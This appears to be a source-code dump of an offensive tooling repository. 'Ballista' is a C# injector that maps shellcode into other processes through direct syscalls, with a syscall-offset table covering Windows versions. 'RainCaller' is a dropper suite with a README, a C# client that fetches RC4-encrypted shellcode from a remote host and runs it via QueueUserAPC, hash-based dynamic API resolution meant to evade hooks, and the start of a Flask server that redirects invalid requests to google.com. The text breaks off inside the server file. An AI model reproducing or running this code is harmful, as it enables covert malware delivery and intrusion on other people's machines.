C:\Users\tester\Ballista.exe 80 | 81 | PS C:\Users\tester> [Ballista.Ballista]::Shoot("WV4CAxsSHxMIX0cgBShaJysd...", "Key") 82 | ``` 83 | 84 | Alternatively, one can Base64 encode (or obfuscate / encrypt) the binary on a local machine: 85 | ```powershell 86 | PS C:\Users\tester> $dll = [System.IO.File]::ReadAllBytes("C:\Users\tester\Ballista.exe") 87 | PS C:\Users\tester> [System.Convert]::ToBase64String($dll) 88 | TVqQAAMAAAAEAAAA//8AA... 89 | ``` 90 | 91 | And afterwards load it on a target machine in the following way: 92 | 93 | ```powershell 94 | PS C:\Users\tester> [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AA...")) 95 | 96 | GAC Version Location 97 | --- ------- -------- 98 | False v4.0.30319 99 | 100 | PS C:\Users\tester> [Ballista.Ballista]::Shoot("WV4CAxsSHxMIX0cgBShaJysd...", "Key") 101 | ``` -------------------------------------------------------------------------------- /Ballista/Ballista/Ballista.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Runtime.InteropServices; 3 | 4 | using static Ballista.Native; 5 | using static Ballista.Syscalls; 6 | using static Ballista.Releases; 7 | 8 | namespace Ballista 9 | { 10 | public class Ballista 11 | { 12 | private static string XOR(string text, string key) 13 | { 14 | var result = new System.Text.StringBuilder(); 15 | 16 | for (int c = 0; c < text.Length; c++) 17 | result.Append((char)((uint)text[c] ^ (uint)key[c % key.Length])); 18 | 19 | return result.ToString(); 20 | } 21 | 22 | static void __Shoot(string[] args) 23 | { 24 | if ( 25 | args.Length == 3 && Int32.TryParse(args[0], out int release) && 26 | release >= 1 && release <= syscallOffsets.Count 27 | ) 28 | { 29 | 30 | UInt32 size = 4096, 31 | sectionSize = size; 32 | 33 | IntPtr sectionHandle = IntPtr.Zero, 34 | localSectionAddress = IntPtr.Zero, 35 | remoteSectionAddress = IntPtr.Zero; 36 | 37 | ulong sectionOffset = 0; 38 | 39 | var currProc = System.Diagnostics.Process.GetCurrentProcess(); 40 | var currProcHandle = currProc.Handle; 41 | var currProcSessionId = currProc.SessionId; 42 | 43 | NtCreateSection(release, ref sectionHandle, SECTION_MAP_READ | SECTION_MAP_WRITE | SECTION_MAP_EXECUTE, IntPtr.Zero, ref sectionSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, IntPtr.Zero); 44 | NtMapViewOfSection(release, sectionHandle, currProcHandle, ref localSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_READWRITE); 45 | if (localSectionAddress != IntPtr.Zero) 46 | { 47 | int tPid = -1; 48 | 49 | if (Int32.TryParse(args[1], out int _pid)) //If parsing fails user provided a string (process name instead of a PID) 50 | tPid = _pid; 51 | else { 52 | var processes = System.Diagnostics.Process.GetProcessesByName(args[1].Replace(".exe", string.Empty)); //Strip .exe if it's in the process name 53 | 54 | if (processes.Length >= 1) 55 | { 56 | foreach(System.Diagnostics.Process proc in processes) 57 | { 58 | if(proc.SessionId == currProcSessionId) 59 | { 60 | tPid = proc.Id; 61 | break; 62 | } 63 | } 64 | } 65 | } 66 | 67 | if (tPid >= 0) 68 | { 69 | var tClientId = new CLIENT_ID(); 70 | tClientId.UniqueProcess = new IntPtr(tPid); 71 | tClientId.UniqueThread = IntPtr.Zero; 72 | 73 | var tObjAttr = new OBJECT_ATTRIBUTES(); 74 | 75 | IntPtr tHandle = IntPtr.Zero; 76 | if (NtOpenProcess(release, ref tHandle, GENERIC_WRITE, ref tObjAttr, ref tClientId) == NTSTATUS.Success) 77 | { 78 | NtMapViewOfSection(release, sectionHandle, tHandle, ref remoteSectionAddress, UIntPtr.Zero, UIntPtr.Zero, out sectionOffset, out size, 2, (uint)0, PAGE_EXECUTE_READ); 79 | 80 | byte[] b64 = Convert.FromBase64String(args[2]); 81 | Marshal.Copy(b64, 0, localSectionAddress, b64.Length); 82 | 83 | IntPtr targetThreadHandle = IntPtr.Zero; 84 | NtCreateThreadEx(release, ref targetThreadHandle, GENERIC_WRITE, IntPtr.Zero, tHandle, remoteSectionAddress, IntPtr.Zero, false, 0, 0, 0, IntPtr.Zero); 85 | } 86 | else 87 | Console.WriteLine("\nFailed to open target process."); 88 | } 89 | else 90 | Console.WriteLine("\nNo such process exists for the current user."); 91 | } 92 | else 93 | Console.WriteLine("\nFailed, most probably due to invalid release."); 94 | } 95 | else 96 | Console.WriteLine("\nArg error."); 97 | } 98 | 99 | public static void Shoot(string arg, string key) 100 | { 101 | __Shoot(XOR(System.Text.Encoding.Default.GetString(Convert.FromBase64String(arg)), key).Split(';')); 102 | } 103 | 104 | static void Main(string[] args) 105 | { 106 | __Shoot(args); 107 | } 108 | } 109 | } 110 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/RainCaller.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Net; 3 | using System.IO; 4 | using System.Runtime.InteropServices; 5 | using System.Diagnostics; 6 | using System.Text; 7 | 8 | using static RainCaller.Native; 9 | 10 | namespace RainCaller 11 | { 12 | public class RainCaller 13 | { 14 | //Override the default WebClient class -> setup a 5 second timeout 15 | //hxxps://stackoverflow.com/questions/1789627/how-to-change-the-timeout-on-a-net-webclient-object 16 | private class __WebClient : WebClient 17 | { 18 | protected override WebRequest GetWebRequest(Uri uri) 19 | { 20 | WebRequest w = base.GetWebRequest(uri); 21 | w.Timeout = 5000; 22 | return w; 23 | } 24 | } 25 | 26 | //hxxps://gist.github.com/hoiogi/89cf2e9aa99ffc3640a4 27 | private static byte[] RC4Crypt(byte[] pwd, byte[] data) 28 | { 29 | int a, i, j, k, tmp; 30 | int[] key, box; 31 | byte[] cipher; 32 | 33 | key = new int[256]; 34 | box = new int[256]; 35 | cipher = new byte[data.Length]; 36 | 37 | for (i = 0; i < 256; i++) 38 | { 39 | key[i] = pwd[i % pwd.Length]; 40 | box[i] = i; 41 | } 42 | for (j = i = 0; i < 256; i++) 43 | { 44 | j = (j + box[i] + key[i]) % 256; 45 | tmp = box[i]; 46 | box[i] = box[j]; 47 | box[j] = tmp; 48 | } 49 | for (a = j = i = 0; i < data.Length; i++) 50 | { 51 | a++; 52 | a %= 256; 53 | j += box[a]; 54 | j %= 256; 55 | tmp = box[a]; 56 | box[a] = box[j]; 57 | box[j] = tmp; 58 | k = box[((box[a] + box[j]) % 256)]; 59 | cipher[i] = (byte)(data[i] ^ k); 60 | } 61 | return cipher; 62 | } 63 | 64 | private static byte[] RetrieveShellcode(string uri) 65 | { 66 | byte[] r = new byte[0]; 67 | 68 | System.Net.ServicePointManager.ServerCertificateValidationCallback = (sender, certificate, chain, sslPolicyErrors) => true; 69 | ServicePointManager.SecurityProtocol = (SecurityProtocolType)3072; 70 | 71 | using (var client = new __WebClient()) 72 | { 73 | client.Headers.Add("Acce" + "pt-E" + "nco" + "di" + "ng", "gzi" + "p, de" + "fla" + "t" + "e"); 74 | client.Headers.Add(HttpRequestHeader.Cookie, "CON" + "SE" + "NT=Y" + "ES"); //IOC 75 | try 76 | { 77 | using (Stream data = client.OpenRead(uri)) 78 | using (var shellcode = new MemoryStream()) 79 | { 80 | data.CopyTo(shellcode); 81 | r = shellcode.ToArray(); 82 | } 83 | } 84 | catch 85 | { 86 | Console.WriteLine("Failed to retrieve shellcode."); 87 | System.Environment.Exit(-1); 88 | } 89 | } 90 | 91 | return r; 92 | } 93 | 94 | private static void Inject(byte[] _sc, string Rc4Key) 95 | { 96 | byte[] sc = RC4Crypt(Encoding.UTF8.GetBytes(Rc4Key), _sc); 97 | 98 | IntPtr scMem = Native.VirtualAlloc(IntPtr.Zero, (uint)sc.Length, Native.MEM_COMMIT, Native.PAGE_EXECUTE_READWRITE); 99 | if (scMem != IntPtr.Zero) 100 | { 101 | var bW = new IntPtr(); 102 | if (Native.WriteProcessMemory(Process.GetCurrentProcess().Handle, scMem, sc, sc.Length, out bW)) 103 | { 104 | if (Native.QueueUserAPC(scMem, GetCurrentThread(), IntPtr.Zero) > 0) 105 | { 106 | Native.NtTestAlert(); 107 | 108 | uint oP = 0; 109 | if (!Native.VirtualProtect(scMem, new UIntPtr((uint)sc.Length), Native.PAGE_READWRITE, out oP)) 110 | Console.WriteLine("Failed to restore the memory region back to RW permissions."); 111 | } 112 | else 113 | Console.WriteLine("Failed to QueueUserAPC."); 114 | } 115 | else 116 | Console.WriteLine("Failed to write shellcode to the memory region."); 117 | } 118 | else 119 | Console.WriteLine("Failed to allocate RWX memory."); 120 | 121 | } 122 | public static void Drop(string uri, string key) 123 | { 124 | Inject(RetrieveShellcode(uri), key); 125 | } 126 | static void Main(string[] args) 127 | { 128 | if (args.Length == 2) 129 | Drop(args[0], args[1]); 130 | else 131 | Console.WriteLine("RainCaller.exe "); 132 | } 133 | } 134 | } 135 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/Native.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Text; 3 | using System.Runtime.InteropServices; 4 | 5 | namespace RainCaller 6 | { 7 | class Native 8 | { 9 | public struct Delegates 10 | { 11 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 12 | public delegate IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect); 13 | 14 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 15 | public delegate bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect); 16 | 17 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 18 | public delegate bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten); 19 | 20 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 21 | public delegate IntPtr GetCurrentThread(); 22 | 23 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 24 | public delegate UInt32 QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData); 25 | 26 | [UnmanagedFunctionPointer(CallingConvention.StdCall)] 27 | public delegate uint NtTestAlert(); 28 | } 29 | 30 | /* 31 | Console.WriteLine("VirtualAlloc: " + GetAPIHash("VirtualAlloc", 0x489c71c8)); 32 | Console.WriteLine("VirtualProtect: " + GetAPIHash("VirtualProtect", 0xff8af7dabc78a4c)); 33 | Console.WriteLine("WriteProcessMemory: " + GetAPIHash("WriteProcessMemory", 0x98c7acfaaa7)); 34 | Console.WriteLine("GetCurrentThread: " + GetAPIHash("GetCurrentThread", 0x81b66d18ff2)); 35 | Console.WriteLine("QueueUserAPC: " + GetAPIHash("QueueUserAPC", 0x78c1c8a2df)); 36 | 37 | VirtualAlloc: 765A35D4990A44EBFFA58ED9D11FCB3A - 0x489c71c8 38 | VirtualProtect: 36E630C1E245C34C48C49996DDD800D7 - 0xff8af7dabc78a4c 39 | WriteProcessMemory: E9875FBBAB315FCF2A085F380E111E78 - 0x98c7acfaaa7 40 | GetCurrentThread: 4AC373A2A9DDC9C64488A9002BD01E19 - 0x81b66d18ff2 41 | QueueUserAPC: 8F31B496099C60DB7B16BEEB10300365 - 0x78c1c8a2df 42 | NtTestAlert: 9830A80D786E0546B6E7D87F01C58C48 - 0x0450fad035012 43 | */ 44 | 45 | //Obfuscation 46 | private static Encoding encoding = Encoding.UTF8; 47 | private static byte[] k32Enc = new byte[] { 0x6B, 0x65, 0x72, 0x6E, 0x65, 0x6C, 0x33, 0x32, 0x2E, 0x64, 0x6C, 0x6C }; //"kernel32.dll" 48 | private static byte[] ntdllEnc = new byte[] { 0x6E, 0x74, 0x64, 0x6C, 0x6C, 0x2E, 0x64, 0x6C, 0x6C }; //ntdll.dll 49 | public static IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint flAllocationType, uint flProtect) 50 | { 51 | object[] funcargs = { lpAddress, dwSize, flAllocationType, flProtect }; 52 | return (IntPtr)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "765A35D4990A44EBFFA58ED9D11FCB3A", 0x489c71c8, typeof(Delegates.VirtualAlloc), ref funcargs); 53 | } 54 | 55 | public static bool VirtualProtect(IntPtr lpAddress, UIntPtr dwSize, uint flNewProtect, out uint lpflOldProtect) 56 | { 57 | lpflOldProtect = 0; 58 | object[] funcargs = { lpAddress, dwSize, flNewProtect, lpflOldProtect }; 59 | 60 | return (bool)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "36E630C1E245C34C48C49996DDD800D7", 0xff8af7dabc78a4c, typeof(Delegates.VirtualProtect), ref funcargs); 61 | } 62 | 63 | public static bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten) 64 | { 65 | lpNumberOfBytesWritten = new IntPtr(); 66 | object[] funcargs = { hProcess, lpBaseAddress, lpBuffer, nSize, lpNumberOfBytesWritten }; 67 | 68 | return (bool)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "E9875FBBAB315FCF2A085F380E111E78", 0x98c7acfaaa7, typeof(Delegates.WriteProcessMemory), ref funcargs); 69 | } 70 | 71 | public static IntPtr GetCurrentThread() 72 | { 73 | object[] funcargs = { }; 74 | 75 | return (IntPtr)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "4AC373A2A9DDC9C64488A9002BD01E19", 0x81b66d18ff2, typeof(Delegates.GetCurrentThread), ref funcargs); 76 | } 77 | 78 | public static UInt32 QueueUserAPC(IntPtr pfnAPC, IntPtr hThread, IntPtr dwData) 79 | { 80 | object[] funcargs = { pfnAPC, hThread, dwData }; 81 | 82 | return (UInt32)DInvoke.DynamicAPIInvoke(encoding.GetString(k32Enc), "8F31B496099C60DB7B16BEEB10300365", 0x78c1c8a2df, typeof(Delegates.QueueUserAPC), ref funcargs); 83 | } 84 | 85 | public static uint NtTestAlert() 86 | { 87 | object[] funcargs = { }; 88 | 89 | return (uint)DInvoke.DynamicAPIInvoke(encoding.GetString(ntdllEnc), "9830A80D786E0546B6E7D87F01C58C48", 0x0450fad035012, typeof(Delegates.NtTestAlert), ref funcargs); 90 | } 91 | 92 | public static uint MEM_COMMIT = 0x1000, 93 | PAGE_EXECUTE_READWRITE = 0x40, 94 | PAGE_READWRITE = 0x04; 95 | } 96 | } 97 | -------------------------------------------------------------------------------- /RainCaller/README.md: -------------------------------------------------------------------------------- 1 | # RainCaller 2 | **RainCaller** is a shellcode dropper suite consisting of a *Python3* webserver (server) and a *C#* dropper (client). 3 | 4 | *** 5 | 6 | ## Server 7 | The server is located in the */Server* folder. 8 | 9 | ### Installation 10 | The server-side part of **RainCaller** has some *Python3* dependencies noted down in the `requirements.txt` file. These can be installed with *pip3*: 11 | ``` 12 | tester@dev:~$ pip3 install -r requirements.txt 13 | Collecting Flask 14 | Downloading Flask-2.0.1-py3-none-any.whl (94 kB) 15 | |████████████████████████████████| 94 kB 1.0 MB/s 16 | ... 17 | ``` 18 | 19 | ### Usage 20 | ``` 21 | tester@dev:~$ python3 main.py 22 | 23 | ██████╗ █████╗ ██╗███╗ ██╗ ██████╗ █████╗ ██╗ ██╗ ███████╗██████╗ 24 | ██╔══██╗██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ ██╔════╝██╔══██╗ 25 | ██████╔╝███████║██║██╔██╗ ██║██║ ███████║██║ ██║ █████╗ ██████╔╝ 26 | ██╔══██╗██╔══██║██║██║╚██╗██║██║ ██╔══██║██║ ██║ ██╔══╝ ██╔══██╗ 27 | ██║ ██║██║ ██║██║██║ ╚████║╚██████╗██║ ██║███████╗███████╗███████╗██║ ██║ 28 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ 29 | @v1.1 30 | 31 | usage: main.py [-h] -a ADDRESS -p PORT -u URI -f FILE -k KEY [--ssl_key SSL_KEY] [--ssl_crt SSL_CRT] 32 | main.py: error: the following arguments are required: -a/--address, -p/--port, -u/--uri, -f/--file, -k/--key 33 | ``` 34 | | Argument | Description | 35 | | ----------- | ----------- | 36 | | ADDRESS | What address to listen on (`0.0.0.0`, `127.0.0.1` ...) | 37 | | PORT | What port to listen on | 38 | | URI | What URI should the shellcode be retrievable from | 39 | | FILE | Path to a file containing unencrypted shellcode in a binary format | 40 | | KEY | Key used to RC4 encrypt the shellcode obtained from the FILE parameter | 41 | | SSL_KEY | Optional path to an SSL key (PEM format) if TLS/SSL is to be used | 42 | | SSL_CRT | Optional path to an SSL certificate (PEM format) if TLS/SSL is to be used | 43 | 44 | ### Example 45 | ``` 46 | tester@dev:~$ sudo python3 main.py -a 0.0.0.0 -p 443 -u /download -f calc_x64_sc.bin -k HelloWorld --ssl_key key.pem --ssl_crt cert.pem 47 | 48 | ██████╗ █████╗ ██╗███╗ ██╗ ██████╗ █████╗ ██╗ ██╗ ███████╗██████╗ 49 | ██╔══██╗██╔══██╗██║████╗ ██║██╔════╝██╔══██╗██║ ██║ ██╔════╝██╔══██╗ 50 | ██████╔╝███████║██║██╔██╗ ██║██║ ███████║██║ ██║ █████╗ ██████╔╝ 51 | ██╔══██╗██╔══██║██║██║╚██╗██║██║ ██╔══██║██║ ██║ ██╔══╝ ██╔══██╗ 52 | ██║ ██║██║ ██║██║██║ ╚████║╚██████╗██║ ██║███████╗███████╗███████╗██║ ██║ 53 | ╚═╝ ╚═╝╚═╝ ╚═╝╚═╝╚═╝ ╚═══╝ ╚═════╝╚═╝ ╚═╝╚══════╝╚══════╝╚══════╝╚═╝ ╚═╝ 54 | @v1.1 55 | 56 | [*]> Starting the server thread... 57 | * Serving Flask app 'main' (lazy loading) 58 | * Environment: production 59 | WARNING: This is a development server. Do not use it in a production deployment. 60 | Use a production WSGI server instead. 61 | * Debug mode: off 62 | [+]> Done. 63 | ... 64 | ``` 65 | In other words, start a listener on the global interface on port `443`. Read shellcode from the `calc_x64_sc.bin` file, encrypt it with the string `HelloWorld` and serve it on the `/download` URI. Use the optional SSL/TLS configuration where `key.pem` and `cert.pem` are valid paths to the corresponding TLS/SSL files. 66 | 67 | *** 68 | 69 | ## Client 70 | The client is located in the */Client* folder. To compile the client, open the solution in *Visual Studio* and target the release build against `.NET Framework 4.0` or `.NET Framework 4.5`. 71 | 72 | ### Usage (Normal) 73 | ``` 74 | C:\Users\Public\Documents\>RainCaller.exe 75 | RainCaller.exe 76 | ``` 77 | | Argument | Description | 78 | | ----------- | ----------- | 79 | | uri | URL to the remote endpoint which serves the shellcode | 80 | | enc_key | Key which the shellcode was encrypted with (used for decryption) | 81 | 82 | 83 | ### Usage (Reflection) 84 | **RainCaller** can be easily reflected into memory: 85 | ```powershell 86 | PS C:\Users\tester> [System.Reflection.Assembly]::LoadFile("C:\Users\tester\RainCaller.exe") 87 | 88 | GAC Version Location 89 | --- ------- -------- 90 | False v4.0.30319 C:\Users\tester\RainCaller.exe 91 | 92 | PS C:\Users\tester> [RainCaller.RainCaller]::Drop("hxxps://maldomain.local/shellcode", "shellcodeEncKey") 93 | ``` 94 | Alternatively, one can Base64 encode (or obfuscate / encrypt) the binary on a local machine: 95 | ```powershell 96 | PS C:\Users\tester> $dll = [System.IO.File]::ReadAllBytes("C:\Users\tester\RainCaller.exe") 97 | PS C:\Users\tester> [System.Convert]::ToBase64String($dll) 98 | TVqQAAMAAAAEAAAA//8AA... 99 | ``` 100 | And afterwards load it on a target machine in the following way: 101 | ```powershell 102 | PS C:\Users\tester> [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String("TVqQAAMAAAAEAAAA//8AA...")) 103 | 104 | GAC Version Location 105 | --- ------- -------- 106 | False v4.0.30319 107 | 108 | PS C:\Users\tester> [RainCaller.RainCaller]::Drop("hxxps://maldomain.local/shellcode", "shellcodeEncKey") 109 | ``` 110 | -------------------------------------------------------------------------------- /Ballista/Ballista/Releases.cs: -------------------------------------------------------------------------------- 1 | using System.Collections.Generic; 2 | 3 | namespace Ballista 4 | { 5 | class Releases 6 | { 7 | public static Dictionary> syscallOffsets = new Dictionary>() 8 | { 9 | //Parts of the dictionary taken from badBounty/directInjectorPOC 10 | 11 | /* Windows 10 */ 12 | { 1, new Dictionary() //W10-20H2, WS-2019 13 | { 14 | { "NtOpenProcess", 0x26}, 15 | { "NtCreateThreadEx", 0xC1}, 16 | { "NtCreateSection", 0x4A}, 17 | { "NtMapViewOfSection", 0x28} 18 | } 19 | }, 20 | { 2, new Dictionary() //W10-2004, WS-2019 21 | { 22 | { "NtOpenProcess", 0x26}, 23 | { "NtCreateThreadEx", 0xC1}, 24 | { "NtCreateSection", 0x4A}, 25 | { "NtMapViewOfSection", 0x28} 26 | } 27 | }, 28 | { 3, new Dictionary() //W10-1909, WS-2019 29 | { 30 | { "NtOpenProcess", 0x26}, 31 | { "NtCreateThreadEx", 0xBD}, 32 | { "NtCreateSection", 0x4A}, 33 | { "NtMapViewOfSection", 0x28} 34 | } 35 | }, 36 | { 4, new Dictionary() //W10-1903, WS-2019 37 | { 38 | { "NtOpenProcess", 0x26}, 39 | { "NtCreateThreadEx", 0xBD}, 40 | { "NtCreateSection", 0x4A}, 41 | { "NtMapViewOfSection", 0x28} 42 | } 43 | }, 44 | { 5, new Dictionary() //W10-1809, WS-2019 45 | { 46 | { "NtOpenProcess", 0x26}, 47 | { "NtCreateThreadEx", 0xBC}, 48 | { "NtCreateSection", 0x4A}, 49 | { "NtMapViewOfSection", 0x28} 50 | } 51 | }, 52 | { 6, new Dictionary() //W10-1803 53 | { 54 | { "NtOpenProcess", 0x26}, 55 | { "NtCreateThreadEx", 0xBB}, 56 | { "NtCreateSection", 0x4A}, 57 | { "NtMapViewOfSection", 0x28} 58 | } 59 | }, 60 | { 7, new Dictionary() //W10-1709 61 | { 62 | { "NtOpenProcess", 0x26}, 63 | { "NtCreateThreadEx", 0xBA}, 64 | { "NtCreateSection", 0x4A}, 65 | { "NtMapViewOfSection", 0x28} 66 | } 67 | }, 68 | { 8, new Dictionary() //W10-1703 69 | { 70 | { "NtOpenProcess", 0x26}, 71 | { "NtCreateThreadEx", 0xB9}, 72 | { "NtCreateSection", 0x4A}, 73 | { "NtMapViewOfSection", 0x28} 74 | } 75 | }, 76 | { 9, new Dictionary() //W10-1607, WS-2016 77 | { 78 | { "NtOpenProcess", 0x26}, 79 | { "NtCreateThreadEx", 0xB6}, 80 | { "NtCreateSection", 0x4A}, 81 | { "NtMapViewOfSection", 0x28} 82 | } 83 | }, 84 | { 10, new Dictionary() //W10-1511, WS-2016 85 | { 86 | { "NtOpenProcess", 0x26}, 87 | { "NtCreateThreadEx", 0xB4}, 88 | { "NtCreateSection", 0x4A}, 89 | { "NtMapViewOfSection", 0x28} 90 | } 91 | }, 92 | { 11, new Dictionary() //W10-1507, WS-2016 93 | { 94 | { "NtOpenProcess", 0x26}, 95 | { "NtCreateThreadEx", 0xB3}, 96 | { "NtCreateSection", 0x4A}, 97 | { "NtMapViewOfSection", 0x28} 98 | } 99 | }, 100 | 101 | /* Windows 7 */ 102 | { 12, new Dictionary() //W7-SP1 + SP0 103 | { 104 | { "NtOpenProcess", 0x23}, 105 | { "NtCreateThreadEx", 0xA5}, 106 | { "NtCreateSection", 0x47}, 107 | { "NtMapViewOfSection", 0x25} 108 | } 109 | }, 110 | 111 | /* Windows Server 2012 */ 112 | { 13, new Dictionary() //WS2012-R2 113 | { 114 | { "NtOpenProcess", 0x25}, 115 | { "NtCreateThreadEx", 0xB0}, 116 | { "NtCreateSection", 0x49}, 117 | { "NtMapViewOfSection", 0x27} 118 | } 119 | }, 120 | { 14, new Dictionary() //WS2012-SP0 121 | { 122 | { "NtOpenProcess", 0x24}, 123 | { "NtCreateThreadEx", 0xAF}, 124 | { "NtCreateSection", 0x48}, 125 | { "NtMapViewOfSection", 0x26} 126 | } 127 | }, 128 | }; 129 | } 130 | } 131 | -------------------------------------------------------------------------------- /RainCaller/Client/RainCaller/DInvoke.cs: -------------------------------------------------------------------------------- 1 | using System; 2 | using System.Diagnostics; 3 | using System.Runtime.InteropServices; 4 | using System.Text; 5 | using System.Security.Cryptography; 6 | 7 | namespace RainCaller 8 | { 9 | class DInvoke 10 | { 11 | /* Sources: 12 | * https://github.com/cobbr/SharpSploit/tree/master/SharpSploit/Execution/DynamicInvoke 13 | * https://thewover.github.io/Dynamic-Invoke/ 14 | * https://blog.nviso.eu/2020/11/20/dynamic-invocation-in-net-to-bypass-hooks/ 15 | */ 16 | public static object DynamicFunctionInvoke(IntPtr FunctionPointer, Type FunctionDelegateType, ref object[] Parameters) 17 | { 18 | Delegate funcDelegate = Marshal.GetDelegateForFunctionPointer(FunctionPointer, FunctionDelegateType); 19 | return funcDelegate.DynamicInvoke(Parameters); 20 | } 21 | public static IntPtr GetLoadedModuleAddress(string DLLName) 22 | { 23 | ProcessModuleCollection ProcModules = Process.GetCurrentProcess().Modules; 24 | foreach (ProcessModule Mod in ProcModules) 25 | { 26 | if (Mod.FileName.ToLower().EndsWith(DLLName.ToLower())) 27 | { 28 | return Mod.BaseAddress; 29 | } 30 | } 31 | 32 | return IntPtr.Zero; 33 | } 34 | public static object DynamicAPIInvoke(string DLLName, string FunctionHash, long HashKey, Type FunctionDelegateType, ref object[] Parameters) 35 | { 36 | return DynamicFunctionInvoke(GetLibraryAddress(DLLName, FunctionHash, HashKey), FunctionDelegateType, ref Parameters); 37 | } 38 | public static IntPtr GetLibraryAddress(string DLLName, string FunctionHash, long Key, bool CanLoadFromDisk = false) 39 | { 40 | IntPtr hModule = GetLoadedModuleAddress(DLLName); 41 | if (hModule == IntPtr.Zero) 42 | { 43 | throw new DllNotFoundException(DLLName + " could not be found."); 44 | } 45 | 46 | return GetExportAddress(hModule, FunctionHash, Key); 47 | } 48 | public static IntPtr GetExportAddress(IntPtr ModuleBase, string FunctionHash, long Key) 49 | { 50 | IntPtr FunctionPtr = IntPtr.Zero; 51 | try 52 | { 53 | // Traverse the PE header in memory 54 | Int32 PeHeader = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + 0x3C)); 55 | Int16 OptHeaderSize = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + PeHeader + 0x14)); 56 | Int64 OptHeader = ModuleBase.ToInt64() + PeHeader + 0x18; 57 | Int16 Magic = Marshal.ReadInt16((IntPtr)OptHeader); 58 | Int64 pExport = 0; 59 | if (Magic == 0x010b) 60 | { 61 | pExport = OptHeader + 0x60; 62 | } 63 | else 64 | { 65 | pExport = OptHeader + 0x70; 66 | } 67 | 68 | // Read -> IMAGE_EXPORT_DIRECTORY 69 | Int32 ExportRVA = Marshal.ReadInt32((IntPtr)pExport); 70 | Int32 OrdinalBase = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x10)); 71 | Int32 NumberOfFunctions = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x14)); 72 | Int32 NumberOfNames = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x18)); 73 | Int32 FunctionsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x1C)); 74 | Int32 NamesRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x20)); 75 | Int32 OrdinalsRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + ExportRVA + 0x24)); 76 | 77 | // Loop the array of export name RVA's 78 | for (int i = 0; i < NumberOfNames; i++) 79 | { 80 | string FunctionName = Marshal.PtrToStringAnsi((IntPtr)(ModuleBase.ToInt64() + Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + NamesRVA + i * 4)))); 81 | if (GetAPIHash(FunctionName, Key).Equals(FunctionHash, StringComparison.OrdinalIgnoreCase)) 82 | { 83 | Int32 FunctionOrdinal = Marshal.ReadInt16((IntPtr)(ModuleBase.ToInt64() + OrdinalsRVA + i * 2)) + OrdinalBase; 84 | Int32 FunctionRVA = Marshal.ReadInt32((IntPtr)(ModuleBase.ToInt64() + FunctionsRVA + (4 * (FunctionOrdinal - OrdinalBase)))); 85 | FunctionPtr = (IntPtr)((Int64)ModuleBase + FunctionRVA); 86 | break; 87 | } 88 | } 89 | } 90 | catch 91 | { 92 | // Catch parser failure 93 | throw new InvalidOperationException("Failed to parse exports."); 94 | } 95 | 96 | if (FunctionPtr == IntPtr.Zero) 97 | { 98 | // Export not found 99 | throw new MissingMethodException(FunctionHash + "export hash could not be found."); 100 | } 101 | return FunctionPtr; 102 | } 103 | 104 | //Helper function to convert a function name to a function hash. 105 | public static string GetAPIHash(string APIName, long Key) 106 | { 107 | byte[] data = Encoding.UTF8.GetBytes(APIName.ToLower()); 108 | byte[] kbytes = BitConverter.GetBytes(Key); 109 | 110 | using (HMACMD5 hmac = new HMACMD5(kbytes)) 111 | { 112 | byte[] bHash = hmac.ComputeHash(data); 113 | return BitConverter.ToString(bHash).Replace("-", ""); 114 | } 115 | } 116 | } 117 | } 118 | -------------------------------------------------------------------------------- /RainCaller/Server/main.py: -------------------------------------------------------------------------------- 1 | import os, threading, argparse, logging, signal 2 | 3 | from flask import Flask, send_file, redirect, request 4 | from time import sleep 5 | from Crypto.Cipher import ARC4 6 | 7 | ENC_FILE_NAME = 'dropper_sc_enc.bin' #Name of the file containing RC4 encrypted shellcode 8 | INVALID_REDIR = 'https://google.com' #URL of a website where invalid requests are redirected to 9 | ANSI_RED = '\033[91m' 10 | ANSI_ORNG = '\033[93m' 11 | ANSI_CYAN = '\033[96m' 12 | ANSI_GRN = '\033[92m' 13 | ANSI_CLR = '\033[0m' 14 | 15 | def __PrintStub(color, symbol, string, ret, fatal=False, end='\n'): 16 | print(f'{color}[{symbol}]> 